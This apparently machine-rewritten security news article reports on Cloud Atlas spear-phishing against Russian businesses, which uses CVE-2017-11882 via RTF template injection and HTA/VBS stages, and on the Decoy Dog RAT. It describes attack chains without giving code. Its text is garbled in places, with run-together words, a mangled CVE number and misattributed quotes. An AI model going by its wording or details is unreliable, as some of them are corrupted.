A hacker group responsible for various cyber threats known as Cloud Atlas was connected to a series of spear-phishing attacks on Russian businesses.

What are the goals of the Cloud Atlas hacker group

Targets included a Russian agroindustrial enterprise and a state-owned research companyaccording to a relationship by FACCT, an independent cybersecurity firm formed after Group-IB's formal exit from Russia earlier this year.

Cloud Atlas, active since at least 2014, is a cyber espionage group of currently unknown origin; also called Clean Ursa, Inception, Oxygen and Red October, the group is known for its persistent campaigns targeting Russia, Belarus, Azerbaijan, Turkey and Slovenia.

In December 2022, Check Point and Positive Technologies released detailed reports on sequences of multi-phase attacks that led to the deployment of one PowerShell-based backdoor called PowerShoweras well as DLL payloads capable of communicating with a server controlled by someone part of Cloud Atlas, presumably.

The starting point is a phishing message with a bait document that it exploits CVE-2017-11882, a six-year-old memory corruption flaw in Microsoft Office's Equation Editorto start executing malicious payloads, a technique Cloud Atlas has been using since October 2018.

“The actor's massive spear-phishing campaigns continue to use his simple yet effective methods to compromise his goals“, Kaspersky announced in August 2019. “Unlike many other intrusion sets, Cloud Atlas has not chosen to use open source facilities during its recent campaigns, to be less discriminatory.”

FACCT described the latest attack chain as similar to that described by Positive Technologies, with the successful CVE-2017- exploit11882 via RTF template injection which paves the way for a shellcode responsible for downloading and executing a redacted HTA file, so it is assumed that the emails come from the popular Russian mail services Yandex Mail and VK's Mail.ru.

The malicious HTML application subsequently launches Visual Basic (VBS) script files that are ultimately responsible for retrieving and executing unknown VBS code from a remote server.

“The Cloud Atlas group has been active for many years, carefully thinking about every aspect of their attacks“he said of the group's Positive Technologies last year, adding “The group's toolkit hasn't changed for years, they try to hide their malware from researchers by using one-time payload requests and validating them. The group avoids network and file attack detection tools by using legitimate cloud storage and well-documented software features, particularly in Microsoft Office.”

The development comes as the company says at least 20 organizations located in Russia have been compromised using Decoy Dog, a modified version of Pupy RAT, attributing it to an advanced threat actor he calls Hellhounds.

The malware actively maintained, as well as allowing the adversary to remotely control the infected hostcomes with a scriptlet designed to transmit telemetry data to an “automated” account on Mastodon under the name “Lamir Hasabat” (@lahat) on the Mindly.Social instance.

“After the publication of materials about the first version of Decoy Dog, the authors of the malware made a lot of effort to hinder its detection and analysis in both traffic and file systems“said security researchers Stanislav Pyzhov and Aleksandr Grigorian.